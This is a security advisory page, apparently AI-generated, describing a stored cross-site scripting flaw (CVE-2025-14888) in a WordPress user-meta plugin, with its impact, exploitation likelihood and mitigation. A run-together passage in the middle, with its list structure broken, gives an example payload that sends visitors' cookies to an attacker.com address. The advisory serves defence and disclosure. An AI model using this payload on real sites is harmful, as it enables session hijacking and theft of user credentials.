
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14888 is a Stored Cross-Site Scripting (XSS) vulnerability in the Simple User Meta Editor plugin for WordPress, affecting all versions up to and including 1.0.0. The flaw arises from insufficient input sanitization and output escaping of the user meta value field, allowing authenticated attackers with administrator-level access to inject arbitrary web scripts. Exploitation is limited to multi-site WordPress installations or single-site installations where unfiltered_html has been disabled. It carries a CVSS v3.1 base score of 4.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The vulnerable code resides in the plugin's editor template (includes/templates/editor/index.php, line 57), where user-supplied meta values are rendered without proper sanitization or escaping (Wordfence, Plugin Source). An attacker with administrator privileges can write a malicious JavaScript payload into a user meta field, which is then stored in the database and executed in the browser of any user who visits the affected page. The attack vector is network-based with high attack complexity and high privilege requirements, and no user interaction is needed for the payload to execute once injected.
Successful exploitation allows persistent JavaScript execution in the context of any user who accesses the injected page, potentially enabling session hijacking, credential theft, or unauthorized actions performed on behalf of victims. Because the payload is stored server-side, it can affect multiple users across a multi-site WordPress network. Confidentiality and integrity are both impacted at a low level, while availability is not directly affected (Wordfence, Red Hat CVE).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.027%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires administrator-level authentication, significantly limiting the attacker pool (Wordfence).
unfiltered_html is disabled.<script>document.location='https://attacker.com/steal?c='+document.cookie</script> and save the changes.includes/templates/editor/index.php.wp_usermeta table entries, particularly in meta values managed by the Simple User Meta Editor plugin.Users should update the Simple User Meta Editor plugin to a version beyond 1.0.0, which addresses the insufficient sanitization and output escaping. If an immediate update is not possible, administrators can mitigate risk by ensuring unfiltered_html is enabled (where policy permits) or by temporarily deactivating the plugin on affected multi-site installations. Restricting administrator account access and monitoring user meta field changes are additional precautionary measures (Wordfence).
The vulnerability was disclosed by Wordfence as part of their threat intelligence program. No notable independent researcher commentary, significant media coverage, or widespread community discussion has been identified for this low-severity, limited-scope vulnerability.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."